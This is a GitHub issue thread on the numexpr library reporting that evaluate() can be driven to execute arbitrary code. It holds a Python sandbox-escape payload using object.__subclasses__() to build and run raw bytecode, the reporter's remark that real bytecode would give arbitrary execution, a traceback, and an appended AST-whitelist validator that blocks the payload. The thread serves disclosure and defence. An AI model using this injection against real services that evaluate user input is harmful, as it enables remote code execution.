Document that it's not safe to use evaluate() with user inputs #323

Closed
Dobatymo opened this issue Oct 17, 2018 · 2 comments

Comments

Dobatymo commented Oct 17, 2018

This crashes CPython (v3.6.6)

import numexpr

# Expression string handed to numexpr: reaches the builtin `function` and
# `code` types through object.__subclasses__() (no builtins needed), builds
# a function from the raw, deliberately invalid bytecode b"a" and calls it.
s = """
(lambda fc=(
    lambda n: [
        c for c in 
            ().__class__.__bases__[0].__subclasses__() 
            if c.__name__ == n
        ][0]
    ):
    fc("function")(
        fc("code")(0,0,0,0,0,b"a",(),(),(),"","",0,b""),{}
    )()
)()
"""
numexpr.evaluate(s)  # crashes CPython 3.6.6 as reported

see: https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html

@Dobatymo Dobatymo changed the title Document if evaluate is safe to use with arbitrary inputs Document that it's not safe to use evaluate with user inputs Oct 17, 2018
robbmcleod (Member) commented

We don't call eval, we call compile. Your code fragment:

(lambda fc=(
    lambda n: [
        c for c in 
            ().__class__.__bases__[0].__subclasses__() 
            if c.__name__ == n
        ][0]
    ):
    fc("function")(
        fc("code")(0,0,0,0,0,b"a",(),(),(),"","",0,b""),{}
    )()
)()

crashes CPython, so probably you should report it as an upstream bug with CPython's compile function.


Dobatymo commented Oct 18, 2018

The point is with this snippet I can execute arbitrary code...
I would only have to replace the b"a" part of the code call with valid code.
I just chose this invalid sequence so as not to have to generate a piece of valid code.

Also it's not the compilation which fails, but the execution, for which you do use eval: https://github.com/pydata/numexpr/blob/master/numexpr/necompiler.py#L299

See:

XXX lineno: 1, opcode: 32
Traceback (most recent call last):
  File "crash.py", line 19, in <module>
    numexpr.evaluate(s)
  File "numexpr\necompiler.py", line 816, in evaluate
    _names_cache[expr_key] = getExprNames(ex, context)
  File "numexpr\necompiler.py", line 707, in getExprNames
    ex = stringToExpression(text, {}, context)
  File "numexpr\necompiler.py", line 299, in stringToExpression
    ex = eval(c, names)
  File "<expr>", line 3, in <module>
  File "<expr>", line 10, in <lambda>
  File "<bad>", line 1, in <module>
SystemError: unknown opcode

when used with b" ".
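The two points argued in this thread, as an added example that is not numexpr's own code: `eval_like_numexpr` is a stand-in modelled on the compile-then-eval call the traceback shows (it is not the library's function), and `find_type_via_gadget` runs the `fc()` helper from the report with the builtins stripped to show that the `__class__`/`__subclasses__` route to the `function` and `code` types does not depend on them. The second half is what a caller can do before `numexpr.evaluate()`: an AST whitelist for arithmetic expressions (`ALLOWED_NODES`, `SAFE_FUNCS` and the `variables` parameter are assumptions chosen for the demo, not a numexpr API), which rejects the payload and anything else that could reach a code object. `safe_evaluate` uses plain `eval()` only so the example runs without numexpr installed; a real caller would pass the validated string to `numexpr.evaluate(expr, local_dict=variables)`.

```python
"""Added example, not numexpr's own code: reproduce the compile()+eval()
mechanism the traceback shows and gate user input with an AST whitelist."""
import ast
import math


# --- 1. The mechanism behind the report ----------------------------------
# stringToExpression() compile()s the string and then eval()s the code
# object.  This stand-in does the same with the builtins stripped, to show
# that stripping them is not a defence.
def eval_like_numexpr(expr: str, names: dict):
    code = compile(expr, "<expr>", "eval")
    return eval(code, {"__builtins__": {}}, dict(names))


# Every object exposes __class__, and object.__subclasses__() lists every
# live class, including `function` and `code`.  This is the fc() helper
# from the report, parameterised on the class name.
GADGET = ("[c for c in ().__class__.__bases__[0].__subclasses__()"
          " if c.__name__ == {name!r}][0]")


def find_type_via_gadget(name: str):
    """Resolve a builtin type by name with no builtins available."""
    return eval_like_numexpr(GADGET.format(name=name), {})


# --- 2. What a caller can do before numexpr.evaluate() -------------------
# Whitelist of AST node types for arithmetic expressions (an assumption
# about what the caller needs; extend it deliberately, never by default).
ALLOWED_NODES = (
    ast.Expression, ast.BinOp, ast.UnaryOp, ast.BoolOp, ast.Compare,
    ast.Call, ast.Name, ast.Constant, ast.Load,
    ast.Add, ast.Sub, ast.Mult, ast.Div, ast.FloorDiv, ast.Mod, ast.Pow,
    ast.BitAnd, ast.BitOr, ast.BitXor, ast.Invert, ast.USub, ast.UAdd,
    ast.Not, ast.And, ast.Or,
    ast.Lt, ast.LtE, ast.Gt, ast.GtE, ast.Eq, ast.NotEq,
)
# Names a user may call; a hypothetical subset chosen for this demo.
SAFE_FUNCS = {
    "sin": math.sin, "cos": math.cos, "tan": math.tan, "sqrt": math.sqrt,
    "exp": math.exp, "log": math.log, "abs": abs,
}


def validate_expression(expr: str, variables) -> ast.Expression:
    """Parse `expr` and reject anything outside the arithmetic whitelist.

    Lambda, Attribute, Subscript, comprehensions, non-numeric constants and
    calls to non-whitelisted names are all rejected, which blocks the
    __class__/__subclasses__ gadget and every other route to a code object.
    """
    try:
        tree = ast.parse(expr, mode="eval")
    except SyntaxError as exc:
        raise ValueError(f"not an expression: {exc.msg}") from None
    for node in ast.walk(tree):
        if not isinstance(node, ALLOWED_NODES):
            raise ValueError(f"disallowed syntax: {type(node).__name__}")
        if isinstance(node, ast.Call):
            if not isinstance(node.func, ast.Name) or node.func.id not in SAFE_FUNCS:
                raise ValueError("only whitelisted function calls are allowed")
            if node.keywords:
                raise ValueError("keyword arguments are not allowed")
        elif isinstance(node, ast.Name):
            if node.id not in variables and node.id not in SAFE_FUNCS:
                raise ValueError(f"unknown name {node.id!r}")
        elif isinstance(node, ast.Constant):
            if not isinstance(node.value, (int, float, complex)):
                raise ValueError("only numeric constants are allowed")
    return tree


def is_safe_expression(expr: str, variables) -> bool:
    try:
        validate_expression(expr, variables)
        return True
    except ValueError:
        return False


def safe_evaluate(expr: str, variables: dict):
    """Validate first, then evaluate.  plain eval() stands in for
    numexpr.evaluate(expr, local_dict=variables) so this runs offline."""
    validate_expression(expr, variables)
    env = {"__builtins__": {}, **SAFE_FUNCS}
    return eval(compile(expr, "<expr>", "eval"), env, dict(variables))


# The payload from the report, verbatim, for the checks below.
PAYLOAD = """(lambda fc=(
    lambda n: [c for c in ().__class__.__bases__[0].__subclasses__()
               if c.__name__ == n][0]):
    fc("function")(fc("code")(0,0,0,0,0,b"a",(),(),(),"","",0,b""),{})()
)()"""


if __name__ == "__main__":
    print(find_type_via_gadget("function"))                   # <class 'function'>
    print(is_safe_expression(PAYLOAD, {}))                    # False
    print(safe_evaluate("2*a + sqrt(b)", {"a": 3, "b": 16}))  # 10.0
```

The validator rejects by node type first, so it is closed by default: a new Python construct that is not in `ALLOWED_NODES` is refused rather than silently passed through. The gadget check is only there to make the maintainer's "we call compile" distinction concrete; the code object still has to be executed by something, and in numexpr that something is `eval()`.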

@Dobatymo Dobatymo changed the title Document that it's not safe to use evaluate with user inputs Document that it's not safe to use evaluate() with user inputs Jan 2, 2019